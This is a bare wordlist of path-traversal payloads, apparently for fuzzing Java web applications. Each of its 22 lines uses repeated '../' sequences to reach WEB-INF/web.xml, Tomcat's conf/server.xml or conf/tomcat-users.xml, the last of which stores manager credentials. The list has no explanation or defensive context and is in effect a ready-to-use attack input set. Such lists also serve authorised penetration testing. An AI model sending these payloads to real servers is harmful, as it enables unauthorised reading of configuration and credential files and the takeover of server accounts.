WEB-INF/web.xml
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
../../../../WEB-INF/web.xml
../../../../../WEB-INF/web.xml
../../../../../../WEB-INF/web.xml
../../../../../../../WEB-INF/web.xml
../conf/server.xml
/conf/server.xml
../conf/tomcat-users.xml
../../conf/tomcat-users.xml
../../../conf/tomcat-users.xml
../../../../conf/tomcat-users.xml
../../../../../conf/tomcat-users.xml
../../../../../../conf/tomcat-users.xml
/../conf/tomcat-users.xml
/../../conf/tomcat-users.xml
/../../../conf/tomcat-users.xml
/../../../../conf/tomcat-users.xml
/../../../../../conf/tomcat-users.xml
/../../../../../../conf/tomcat-users.xml